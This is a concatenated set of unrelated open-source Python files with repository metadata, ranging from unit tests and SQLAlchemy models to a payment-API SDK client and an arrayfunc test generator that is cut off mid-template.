def setUp(self): with fluid.program_guard(self.main_program, self.startup_program): data = fluid.data( name="data", shape=[-1, 3, 64, 64], dtype="float32") param_attr = fluid.ParamAttr( initializer=fluid.initializer.Xavier(uniform=False), learning_rate=0.001) conv_out = fluid.layers.conv2d( input=data, num_filters=3, filter_size=3, groups=3, padding='Same', bias_attr=param_attr, act=None) input_scale = fluid.layers.create_parameter( shape=[3], dtype="float32") input_bias = fluid.layers.create_parameter( shape=[3], dtype="float32") ac_out = fluid.layers.affine_channel( x=conv_out, scale=input_scale, bias=input_bias) self.feeds = { "data": np.random.random([1, 3, 64, 64]).astype("float32"), } self.fetch_list = [ac_out] def test_check_output(self): self.check_output() self.assertTrue( PassVersionChecker.IsCompatible( 'conv_eltwiseadd_affine_channel_fuse_pass')) if __name__ == "__main__": unittest.main()

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null

0

1

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7

ec18f00cf4629474fb0b1723068065d94991da01

2,193

py

Python

models.py

Maskgirl/restaurant-reservation-system

6a88fd132a593435f35a46b140f257cee70d4760

[ "MIT" ]

null

models.py

Maskgirl/restaurant-reservation-system

6a88fd132a593435f35a46b140f257cee70d4760

[ "MIT" ]

null

models.py

Maskgirl/restaurant-reservation-system

6a88fd132a593435f35a46b140f257cee70d4760

[ "MIT" ]

null

__all__ = ['Restaurant', 'User', 'UnbookedTables', 'BookedTables'] from datetime import datetime from sqlalchemy_serializer import SerializerMixin from flask_login import UserMixin from common import db class Restaurant(db.Model, SerializerMixin): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(200), nullable=False) desc = db.Column(db.String(500), nullable=False) no_of_2_chairs_table = db.Column(db.Integer) no_of_4_chairs_table = db.Column(db.Integer) no_of_6_chairs_table = db.Column(db.Integer) no_of_12_chairs_table = db.Column(db.Integer) date_created = db.Column(db.DateTime, default=datetime.utcnow) class User(db.Model, SerializerMixin, UserMixin): id = db.Column(db.Integer, primary_key=True) first_name = db.Column(db.String(55), nullable=False) last_name = db.Column(db.String(55), nullable=False) email = db.Column(db.String(144)) password = db.Column(db.String(144)) phone = db.Column(db.String(12)) address = db.Column(db.String(500)) date_created = db.Column(db.DateTime, default=datetime.utcnow) class UnbookedTables(db.Model, SerializerMixin): id = db.Column(db.Integer, primary_key=True) restaurant_id = db.Column(db.Integer) no_of_2_chairs_table = db.Column(db.Integer) no_of_4_chairs_table = db.Column(db.Integer) no_of_6_chairs_table = db.Column(db.Integer) no_of_12_chairs_table = db.Column(db.Integer) start_datetime = db.Column(db.DateTime, nullable=False) end_datetime = db.Column(db.DateTime, nullable=False) date_created = db.Column(db.DateTime, default=datetime.utcnow) class BookedTables(db.Model, SerializerMixin): id = db.Column(db.Integer, primary_key=True) restaurant_id = db.Column(db.Integer) user_id = db.Column(db.Integer) no_of_2_chairs_table = db.Column(db.Integer) no_of_4_chairs_table = db.Column(db.Integer) no_of_6_chairs_table = db.Column(db.Integer) no_of_12_chairs_table = db.Column(db.Integer) start_datetime = db.Column(db.DateTime, nullable=False) end_datetime = db.Column(db.DateTime, nullable=False) date_created = db.Column(db.DateTime, default=datetime.utcnow)

39.160714

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2,193

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1

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null

0

1

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7

ec21d914626cc24283c6273e97da681336f8304f

901

py

Python

example/example.py

Thom7/deep_fried_meme

508eca7e5ad8b84cc2455c28d40135bfc44efc9f

[ "MIT" ]

2

2020-06-05T18:37:37.000Z

2020-09-13T12:16:35.000Z

example/example.py

Thom7/deep_fried_meme

508eca7e5ad8b84cc2455c28d40135bfc44efc9f

[ "MIT" ]

5

2020-10-08T11:43:15.000Z

2020-10-11T13:53:09.000Z

example/example.py

Thom7/deep_fried_meme

508eca7e5ad8b84cc2455c28d40135bfc44efc9f

[ "MIT" ]

1

2021-05-23T08:12:55.000Z

from deep_fried_meme import deep_frier print(deep_frier('Hilbert.png', config = None, putout_scheme = ['file', 'proc Hilbert 1', 'jpg'])) # Process an image in machine then export in machine print('===') print(deep_frier('Hilbert.png', config = None, putout_scheme = ['response data'])) # Process an image in machine then return response data that Flask, Django can handle print('===') print(deep_frier('https://upload.wikimedia.org/wikipedia/commons/2/24/Hilbert_Curve.256x256%2C16-bit_greyscale.png', config = None, putout_scheme = ['file', 'proc Hilbert 2', 'jpg'])) # Process an image from direct url then export in machine print('===') print(deep_frier('https://upload.wikimedia.org/wikipedia/commons/2/24/Hilbert_Curve.256x256%2C16-bit_greyscale.png', config = None, putout_scheme = ['response data'])) # Process an image from direct url then return response data that Flask, Django can handle

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null

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8

6b6ab65d67b8dc7d8cd2aadc9e09ddef5228b694

2,912

py

Python

tests/unittesting/tasks/memory/test_delay_context_manager.py

shepilov-vladislav/aiotasks

be888895b6509d062ee4e1564b7eec05477f5a7d

[ "BSD-3-Clause" ]

462

2017-03-28T08:01:28.000Z

2022-03-17T19:13:55.000Z

tests/unittesting/tasks/memory/test_delay_context_manager.py

shepilov-vladislav/aiotasks

be888895b6509d062ee4e1564b7eec05477f5a7d

[ "BSD-3-Clause" ]

12

2017-04-02T10:20:57.000Z

2020-10-06T12:18:55.000Z

tests/unittesting/tasks/memory/test_delay_context_manager.py

shepilov-vladislav/aiotasks

be888895b6509d062ee4e1564b7eec05477f5a7d

[ "BSD-3-Clause" ]

51

2017-03-31T17:43:34.000Z

2022-03-31T13:42:35.000Z

import pytest import asyncio from aiotasks import build_manager, AioTasksTimeout def test_memory_wait_oks(event_loop): manager = build_manager(dsn="memory://", loop=event_loop) globals()["test_memory_wait_oks_finished"] = False @manager.task() async def task_test_memory_wait_oks(): return True async def run(): manager.run() async with task_test_memory_wait_oks.delay() as f: globals()["test_memory_wait_oks_finished"] = f event_loop.run_until_complete(run()) manager.stop() assert globals()["test_memory_wait_oks_finished"] == True del globals()["test_memory_wait_oks_finished"] def test_memory_wait_timeout_raises(event_loop): manager = build_manager(dsn="memory://", loop=event_loop) globals()["test_memory_wait_timeout_raises_finished"] = False @manager.task() async def task_test_memory_wait_oks(): await asyncio.sleep(2, loop=event_loop) return True async def run(): manager.run() try: async with task_test_memory_wait_oks.delay(timeout=0.2) as f: pass except AioTasksTimeout: globals()["test_memory_wait_timeout_raises_finished"] = True event_loop.run_until_complete(run()) manager.stop() assert globals()["test_memory_wait_timeout_raises_finished"] is True del globals()["test_memory_wait_timeout_raises_finished"] def test_memory_wait_infinite_timeout_raises(event_loop): manager = build_manager(dsn="memory://", loop=event_loop) globals()["test_memory_wait_infinite_timeout_raises_finished"] = False @manager.task() async def task_test_memory_wait_oks(): await asyncio.sleep(2, loop=event_loop) return True async def run(): manager.run() try: async with task_test_memory_wait_oks.delay(infinite_timeout=0.2) as f: globals()["test_memory_wait_infinite_timeout_raises_finished"] = f except AioTasksTimeout: globals()["test_memory_wait_timeout_raises_finished"] = True event_loop.run_until_complete(run()) manager.stop() assert globals()["test_memory_wait_infinite_timeout_raises_finished"] == False del globals()["test_memory_wait_infinite_timeout_raises_finished"] def test_memory_wait_infinite_raises_timeout_exception(event_loop): manager = build_manager(dsn="memory://", loop=event_loop) globals()["test_memory_wait_infinite_timeout_raises_finished"] = False @manager.task() async def task_test_memory_wait_oks(): await asyncio.sleep(2, loop=event_loop) return True async def run(): manager.run() with pytest.raises(AioTasksTimeout): async with task_test_memory_wait_oks.delay(infinite_timeout=0.2) as f: pass event_loop.run_until_complete(run()) manager.stop()

26.715596

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2,912

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1

0

1

0

1

0

null

0

7

6b9f178572d92a97d4baf81f3ae8be4ec6f65272

2,808

py

Python

tests/test_reader.py

ironhouzi/pytib

e85bad59e842f24117cc318df35080f81abe0062

[ "MIT" ]

2

2018-09-15T16:15:33.000Z

2020-04-03T06:47:06.000Z

tests/test_reader.py

ironhouzi/pytib

e85bad59e842f24117cc318df35080f81abe0062

[ "MIT" ]

null

tests/test_reader.py

ironhouzi/pytib

e85bad59e842f24117cc318df35080f81abe0062

[ "MIT" ]

null

import pytest from pytib.read import read, _partition_word from pytib.tables import generate_tables @pytest.fixture def table(): return generate_tables({}) def test_classify_valid_word(table): assert tuple(_partition_word('sangs', table)) == ('sangs',) assert tuple(_partition_word('sangs/', table)) == ('sangs', '/') assert tuple(_partition_word('/sangs', table)) == ('/', 'sangs') assert tuple(_partition_word('sangs/foo', table)) == ('sangs', '/', 'foo') assert tuple(_partition_word('sangs//foo', table)) == ('sangs', '//', 'foo') def test_bka(table): uni = '\u0f56' + '\u0f40' + '\u0F60' latin = "bka'" assert ''.join(read(latin, table)).rstrip() == uni def test_unsplit_heading_curly(table): assert ''.join(read('{sangs', table)).rstrip() == '{ སངས' def test_unsplit_trailing_curly(table): assert ''.join(read('sangs}', table)).rstrip() == 'སངས }' def test_unsplit_curly(table): assert ''.join(read('{sangs sangs}', table)).rstrip() == '{ སངས་སངས }' def test_joined_shad_after_nga(table): assert ''.join(read('dang/', table)).rstrip() == 'དང་།' def test_spaced_shad_after_nga(table): assert ''.join(read('dang /', table)).rstrip() == 'དང་།' def test_double_joined_shad_after_nga(table): assert ''.join(read('sang/ dang/', table)).rstrip() == 'སང་། དང་།' def test_double_joined_shad_after_nga_w_ws(table): assert ''.join(read('sang/dang/', table)).rstrip() == 'སང་། དང་།' def test_double_joined_shad_after_nga_w_nl(table): assert ''.join(read('sang\n/dang/', table)).rstrip() == 'སང\n། དང་།' def test_double_spaced_shad_after_nga(table): assert ''.join(read('sang / dang /', table)).rstrip() == 'སང་། དང་།' def test_double_spaced_shad_after_nga_w_leading_shad(table): assert ''.join(read('/ sang / dang /', table)).rstrip() == '། སང་། དང་།' def test_two_trailing_shad_in_word(table): assert ''.join(read('sang/dang/', table)).rstrip() == 'སང་། དང་།' def test_two_leading_shad_in_word(table): assert ''.join(read('/sang/dang', table)).rstrip() == '། སང་། དང' def test_three_shad_in_word(table): assert ''.join(read('/sang/dang/', table)).rstrip() == '། སང་། དང་།' def test_multiple_invalid_in_word(table): assert ''.join(read('/foo/fofo/', table)).rstrip() == '། foo ། fofo །' def test_double_shad_for_kha(table): assert ''.join(read('ka/', table)).rstrip() == 'ཀ །' def test_invalid_double_shad_for_kha(table): assert ''.join(read('ka//', table)).rstrip() == 'ཀ །' def test_double_shad_for_ga(table): assert ''.join(read('ga/', table)).rstrip() == 'ག །' def test_invalid_double_shad_for_ga(table): assert ''.join(read('ga//', table)).rstrip() == 'ག །' # def test_no_double_shad_for_ga(table): # assert ''.join(read('ga/', table)).rstrip() == 'ག'

28.08

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0.71494

0.708071

0.642816

0

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2,808

99

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0

null

0

1

0

1

0

9

6bf2e92c0ed3ffa085d14e979c5327a7750c6a83

19,377

py

Python

src/PythonNetBanxSDK/CustomerVault/CustomerVaultService.py

EDUlib/Paysafe

64b0fe40b56f2f86b2d7a4e5f5d437d37c460f81

[ "MIT" ]

null

src/PythonNetBanxSDK/CustomerVault/CustomerVaultService.py

EDUlib/Paysafe

64b0fe40b56f2f86b2d7a4e5f5d437d37c460f81

[ "MIT" ]

null

src/PythonNetBanxSDK/CustomerVault/CustomerVaultService.py

EDUlib/Paysafe

64b0fe40b56f2f86b2d7a4e5f5d437d37c460f81

[ "MIT" ]

null

''' Created on 30-Jan-2015 @author: Asawari.Vaidya ''' import inspect from PythonNetBanxSDK import CustomerVault from PythonNetBanxSDK import common class CustomerVaultService(object): ''' classdocs ''' # Define URL paths for Customer Profile, Address and Card _MONITOR_PATH = '/customervault/monitor' _URI = '/customervault/v1' _PROFILE_PATH = '/profiles/' _ADDRESS_PATH = '/addresses/' _CARD_PATH = '/cards/' def __init__(self, optimal_object): ''' Constructor ''' self.optimal_object = optimal_object ''' Prepare URL for process request @param: Chunks of paths @return: Complete URL for Processing Request ''' def _prepare_uri(self, path): return self._URI + path ''' Process the response from the Server @param: response object, class name @return: object of class ''' def _process_response(self, response, class_name): if isinstance(response, int): response_status = class_name(None) response_status.status = response return (response_status) elif response is None: return class_name(None) elif isinstance(response, common.Error.Error): return self.prepare_error(class_name, response.code, response.message) else: return (class_name(response)) ''' Prepare Error Response @param: response object, class name @return: object of class ''' def prepare_error(self, class_name, error_code, error_message): error_object_response = class_name(None) error_obj = common.Error.Error(None) error_obj.code(error_code) error_obj.message(error_message) error_object_response.error(error_obj.__dict__) return (error_object_response) ''' Monitor @param: None @return: Response Status @raise: IOException @raise: OptimalException ''' def monitor(self): FULL_URL = self._MONITOR_PATH # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="GET", url=FULL_URL, data=None) return (self._process_response(response, CustomerVault.Profile.Profile)) ''' Create a Customer Profile @param: Profile object @return: Profile object @raise: IOException @raise: OptimalException ''' def create_profile(self, data): FULL_URL = self._prepare_uri(self._PROFILE_PATH) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="POST", url=FULL_URL, data=data) return (self._process_response(response, CustomerVault.Profile.Profile)) ''' Lookup a Customer Profile @param: Profile Id @return: Profile object @raise exception: IOException @raise exception: OptimalException ''' def lookup_profile(self, data): profile_id = data.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error( CustomerVault.Addresses.Address, "400", err_msg)) del data.id FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="GET", url=FULL_URL, data=None) return (self._process_response(response, CustomerVault.Profile.Profile)) ''' Lookup a Customer Profile with Subcomponents @param: Profile Id @param: is_ddresses indicate whether to include addresses in response @param: is_ards indicate whether to include cards in response @return: Profile object @raise: IOException @raise: OptimalException ''' def lookup_profile_subcomponents(self, data, is_addresses, is_cards): _subcomponents = '?fields=cards,addresses' _subcomponent_card = '?fields=cards' _subcomponent_address = '?fields=addresses' profile_id = data.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error( CustomerVault.Addresses.Address, "400", err_msg)) del data.id if (is_addresses is True and is_cards is True): FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ _subcomponents) elif (is_addresses is True and is_cards is False): FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ _subcomponent_address) elif (is_addresses is False and is_cards is True): FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ _subcomponent_card) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="GET", url=FULL_URL, data=None) return (self._process_response(response, CustomerVault.Profile.Profile)) ''' Update a Customer Profile @param: Profile Id, Profile object @return: Profile object @raise: IOException @raise: OptimalException ''' def update_profile(self, data): profile_id = data.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error( CustomerVault.Addresses.Address, "400", err_msg)) del data.id FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="PUT", url=FULL_URL, data=data) return (self._process_response(response, CustomerVault.Profile.Profile)) ''' Delete a Customer Profile @param: Profile Id @return: Response Status @raise: IOException @raise: OptimalException ''' def delete_profile(self, data): profile_id = data.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error( CustomerVault.Addresses.Address, "400", err_msg)) del data.id FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="DELETE", url=FULL_URL, data=None) return (self._process_response(response, CustomerVault.Profile.Profile)) ''' Create an Address @param: Profile Id, Address object @return: Address object @raise: IOException @raise: OptimalException ''' def create_address(self, data): profile_id = data.profile.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error( CustomerVault.Addresses.Address, "400", err_msg)) del data.profile FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ self._ADDRESS_PATH) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="POST", url=FULL_URL, data=data) return (self._process_response(response, CustomerVault.Addresses.Address)) ''' Lookup an Address @params: Profile Id, Address Id, Address object @return: Address object @raise: IOException @raise: OptimalException ''' def lookup_address(self, data): profile_id = data.profile.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error( CustomerVault.Addresses.Address, "400", err_msg)) del data.profile address_id = data.id if inspect.ismethod(address_id): err_msg = "Address Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.id FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ self._ADDRESS_PATH + \ address_id) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="GET", url=FULL_URL, data=None) return (self._process_response(response, CustomerVault.Addresses.Address)) ''' Update an Address @param: Profile Id, Address Id, Address object @return: Address object @raise: IOException @raise: OptimalException ''' def update_address(self, data): profile_id = data.profile.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.profile address_id = data.id if inspect.ismethod(address_id): err_msg = "Address Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.id FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ self._ADDRESS_PATH + \ address_id) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="PUT", url=FULL_URL, data=data) return (self._process_response(response, CustomerVault.Addresses.Address)) ''' Delete an Address @param: Profile Id, Address Id @return: Response Status @raise: IOException @raise: OptimalException ''' def delete_address(self, data): profile_id = data.profile.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.profile address_id = data.id if inspect.ismethod(address_id): err_msg = "Address Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.id FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ self._ADDRESS_PATH + \ address_id) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="DELETE", url=FULL_URL, data=None) return (self._process_response(response, CustomerVault.Addresses.Address)) ''' Create a Card @param: Profile Id, Card object @return: Card object @raise: IOException @raise: OptimalException ''' def create_card(self, data): profile_id = data.profile.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.profile FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ self._CARD_PATH) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="POST", url=FULL_URL, data=data) return (self._process_response(response, CustomerVault.Card.Card)) ''' Lookup a Card @param: Profile Id, Card Id, Card object @return: Card object @raise: IOException @raise: OptimalException ''' def lookup_card(self, data): profile_id = data.profile.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.profile card_id = data.id if inspect.ismethod(card_id): err_msg = "Card Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.id FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ self._CARD_PATH + \ card_id) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="GET", url=FULL_URL, data=None) return (self._process_response(response, CustomerVault.Card.Card)) ''' Update a Card @param: Profile Id, Card Id, Card object @return: Card object @raise: IOException @raise: OptimalException ''' def update_card(self, data): profile_id = data.profile.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.profile card_id = data.id if inspect.ismethod(card_id): err_msg = "Card Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.id FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ self._CARD_PATH + \ card_id) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="PUT", url=FULL_URL, data=data) return (self._process_response(response, CustomerVault.Card.Card)) ''' Delete a Card @param: Profile Id, Card Id @return: Response Status @raise: IOException @raise: OptimalException ''' def delete_card(self, data): profile_id = data.profile.id if inspect.ismethod(profile_id): err_msg = "Profile Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.profile card_id = data.id if inspect.ismethod(card_id): err_msg = "Card Id not available" return (self.prepare_error(CustomerVault.Addresses.Address, "400", err_msg)) del data.id FULL_URL = self._prepare_uri(self._PROFILE_PATH + \ profile_id + \ self._CARD_PATH + \ card_id) # print ("Communicating to ", FULL_URL) response = self.optimal_object.process_request( req_method="DELETE", url=FULL_URL, data=None) return (self._process_response(response, CustomerVault.Card.Card))

38.987928

91

0.472725

1,637

19,377

5.359194

0.064753

0.071811

0.072723

0.047646

0.825259

0.815798

0.808047

0.788784

0.766329

0

0.005803

0.457501

19,377

497

92

38.987928

0.828767

0.033958

0

0.809061

0

0.040774

0.002818

0

1

0.058252

false

0

0.009709

0.003236

0.210356

0

null

0

1

0

1

0

null

0

7

d415993aaa0f68f1472a68795a950ba24642fbb9

193

py

Python

server/get_features/features/extractors/__init__.py

kzk-IS/MADMAX

baece33aff15a23b82afdf1733d2589cb7b8314f

[ "MIT" ]

1

2022-03-28T14:44:04.000Z

server/get_features/features/extractors/__init__.py

kzk-IS/MADMAX

baece33aff15a23b82afdf1733d2589cb7b8314f

[ "MIT" ]

null

server/get_features/features/extractors/__init__.py

kzk-IS/MADMAX

baece33aff15a23b82afdf1733d2589cb7b8314f

[ "MIT" ]

1

2022-01-03T10:19:02.000Z

from .domain_name_features_extractor import Domain_Name_Features_Extractor from .dns_features_extractor import DNS_Features_Extractor from .web_features_extractor import Web_Features_Extractor

48.25

74

0.92228

26

193

6.307692

0.307692

0.621951

0.420732

0.329268

0

0.062176

193

3

75

64.333333

0.906077

0

1

0

true

0

1

0

1

0

1

0

null

1

0

1

0

null

0

1

0

1

0

1

0

8

d43ce6d69b58537887ab75e29afbec9c7f0f927a

1,257

py

Python

temboo/core/Library/Facebook/Publishing/__init__.py

jordanemedlock/psychtruths

52e09033ade9608bd5143129f8a1bfac22d634dd

[ "Apache-2.0" ]

7

2016-03-07T02:07:21.000Z

2022-01-21T02:22:41.000Z

temboo/core/Library/Facebook/Publishing/__init__.py

jordanemedlock/psychtruths

52e09033ade9608bd5143129f8a1bfac22d634dd

[ "Apache-2.0" ]

null

temboo/core/Library/Facebook/Publishing/__init__.py

jordanemedlock/psychtruths

52e09033ade9608bd5143129f8a1bfac22d634dd

[ "Apache-2.0" ]

8

2016-06-14T06:01:11.000Z

2020-04-22T09:21:44.000Z

from temboo.Library.Facebook.Publishing.CreateAlbum import CreateAlbum, CreateAlbumInputSet, CreateAlbumResultSet, CreateAlbumChoreographyExecution from temboo.Library.Facebook.Publishing.CreateCheckin import CreateCheckin, CreateCheckinInputSet, CreateCheckinResultSet, CreateCheckinChoreographyExecution from temboo.Library.Facebook.Publishing.LeaveComment import LeaveComment, LeaveCommentInputSet, LeaveCommentResultSet, LeaveCommentChoreographyExecution from temboo.Library.Facebook.Publishing.Like import Like, LikeInputSet, LikeResultSet, LikeChoreographyExecution from temboo.Library.Facebook.Publishing.Post import Post, PostInputSet, PostResultSet, PostChoreographyExecution from temboo.Library.Facebook.Publishing.PublishLink import PublishLink, PublishLinkInputSet, PublishLinkResultSet, PublishLinkChoreographyExecution from temboo.Library.Facebook.Publishing.RSVPEvent import RSVPEvent, RSVPEventInputSet, RSVPEventResultSet, RSVPEventChoreographyExecution from temboo.Library.Facebook.Publishing.SetStatus import SetStatus, SetStatusInputSet, SetStatusResultSet, SetStatusChoreographyExecution from temboo.Library.Facebook.Publishing.UploadPhoto import UploadPhoto, UploadPhotoInputSet, UploadPhotoResultSet, UploadPhotoChoreographyExecution

125.7

157

0.899761

99

1,257

11.424242

0.424242

0.079576

0.135279

0.198939

0.278515

0

0.050119

1,257

9

158

139.666667

0.947236

0

1

0

true

0

1

0

1

0

1

null

0

1

0

1

0

1

0

null

0

1

0

1

0

1

0

7

cf27776087bbb966acb60c3f46da40730006490c

26,124

py

Python

codegen/ldexp_testgen.py

m1griffin/arrayfunc

df57097699c25d3e949e1ade307ed61eaa5728c2

[ "Apache-2.0" ]

2

2017-08-28T08:41:16.000Z

2018-05-29T03:49:36.000Z

codegen/ldexp_testgen.py

m1griffin/arrayfunc

df57097699c25d3e949e1ade307ed61eaa5728c2

[ "Apache-2.0" ]

null

codegen/ldexp_testgen.py

m1griffin/arrayfunc

df57097699c25d3e949e1ade307ed61eaa5728c2

[ "Apache-2.0" ]

null

#!/usr/bin/env python3 ############################################################################## # Project: arrayfunc # Purpose: Generate the unit tests for the ldexp math function. # Language: Python 3.5 # Date: 28-Jan-2018 # ############################################################################### # # Copyright 2014 - 2018 Michael Griffin <m12.griffin@gmail.com> # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ############################################################################## # ============================================================================== import itertools import codegen_common # ============================================================================== # ============================================================================== # This template is for the basic tests. test_template_ldexp = ''' ############################################################################## class %(funclabel)s_general_%(typelabel)s(unittest.TestCase): """Test for basic general function operation using numeric data %(test_op_y)s. test_template_ldexp """ ############################################################################## def FloatassertEqual(self, expecteditem, dataoutitem, msg=None): """This function is patched into assertEqual to allow testing for the floating point special values NaN, Inf, and -Inf. """ # NaN cannot be compared using normal means. if math.isnan(dataoutitem) and math.isnan(expecteditem): pass # Anything else can be compared normally. else: if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0): raise self.failureException('%%0.3f != %%0.3f' %% (expecteditem, dataoutitem)) ######################################################## def setUp(self): """Initialise. """ self.addTypeEqualityFunc(float, self.FloatassertEqual) ######################################################## def test_%(funclabel)s_basic_array_num_none_a1(self): """Test %(funclabel)s as *array-num-none* for basic function - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): data1 = array.array('%(typecode)s', [%(test_op_x)s]) expected = [%(pyoperator)s(x, testval) for x in data1] arrayfunc.%(funcname)s(data1, testval) for dataoutitem, expecteditem in zip(data1, expected): # The behavour of assertEqual is modified by addTypeEqualityFunc. self.assertEqual(dataoutitem, expecteditem) ######################################################## def test_%(funclabel)s_basic_array_num_none_a2(self): """Test %(funclabel)s as *array-num-none* for basic function with matherrors=True - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): data1 = array.array('%(typecode)s', [%(test_op_x)s]) expected = [%(pyoperator)s(x, testval) for x in data1] arrayfunc.%(funcname)s(data1, testval, matherrors=True) for dataoutitem, expecteditem in zip(data1, expected): # The behavour of assertEqual is modified by addTypeEqualityFunc. self.assertEqual(dataoutitem, expecteditem) ######################################################## def test_%(funclabel)s_basic_array_num_none_a3(self): """Test %(funclabel)s as *array-num-none* for basic function with array limit - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): data1 = array.array('%(typecode)s', [%(test_op_x)s]) limited = len(data1) // 2 pydataout = [%(pyoperator)s(x, testval) for x in data1] expected = pydataout[0:limited] + list(data1)[limited:] arrayfunc.%(funcname)s(data1, testval, maxlen=limited) for dataoutitem, expecteditem in zip(data1, expected): # The behavour of assertEqual is modified by addTypeEqualityFunc. self.assertEqual(dataoutitem, expecteditem) ######################################################## def test_%(funclabel)s_basic_array_num_none_a4(self): """Test %(funclabel)s as *array-num-none* for basic function with matherrors=True and with array limit - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): data1 = array.array('%(typecode)s', [%(test_op_x)s]) limited = len(data1) // 2 pydataout = [%(pyoperator)s(x, testval) for x in data1] expected = pydataout[0:limited] + list(data1)[limited:] arrayfunc.%(funcname)s(data1, testval, matherrors=True, maxlen=limited) for dataoutitem, expecteditem in zip(data1, expected): # The behavour of assertEqual is modified by addTypeEqualityFunc. self.assertEqual(dataoutitem, expecteditem) ######################################################## def test_%(funclabel)s_basic_array_num_array_b1(self): """Test %(funclabel)s as *array-num-array* for basic function - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): data1 = array.array('%(typecode)s', [%(test_op_x)s]) dataout = array.array('%(typecode)s', [0]*len(data1)) expected = [%(pyoperator)s(x, testval) for x in data1] arrayfunc.%(funcname)s(data1, testval, dataout) for dataoutitem, expecteditem in zip(dataout, expected): # The behavour of assertEqual is modified by addTypeEqualityFunc. self.assertEqual(dataoutitem, expecteditem) ######################################################## def test_%(funclabel)s_basic_array_num_array_b2(self): """Test %(funclabel)s as *array-num-array* for basic function with matherrors=True - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): data1 = array.array('%(typecode)s', [%(test_op_x)s]) dataout = array.array('%(typecode)s', [0]*len(data1)) expected = [%(pyoperator)s(x, testval) for x in data1] arrayfunc.%(funcname)s(data1, testval, dataout, matherrors=True) for dataoutitem, expecteditem in zip(dataout, expected): # The behavour of assertEqual is modified by addTypeEqualityFunc. self.assertEqual(dataoutitem, expecteditem) ######################################################## def test_%(funclabel)s_basic_array_num_array_b3(self): """Test %(funclabel)s as *array-num-array* for basic function with array limit - Array code %(typelabel)s. """ for testval in [%(test_op_y)s]: with self.subTest(msg='Failed with parameter', testval = testval): data1 = array.array('%(typecode)s', [%(test_op_x)s]) dataout = array.array('%(typecode)s', [0]*len(data1)) limited = len(data1) // 2 pydataout = [%(pyoperator)s(x, testval) for x in data1] expected = pydataout[0:limited] + list(dataout)[limited:] arrayfunc.%(funcname)s(data1, testval, dataout, maxlen=limited) for dataoutitem, expecteditem in zip(dataout, expected): # The behavour of assertEqual is modified by addTypeEqualityFunc. self.assertEqual(dataoutitem, expecteditem) ######################################################## def 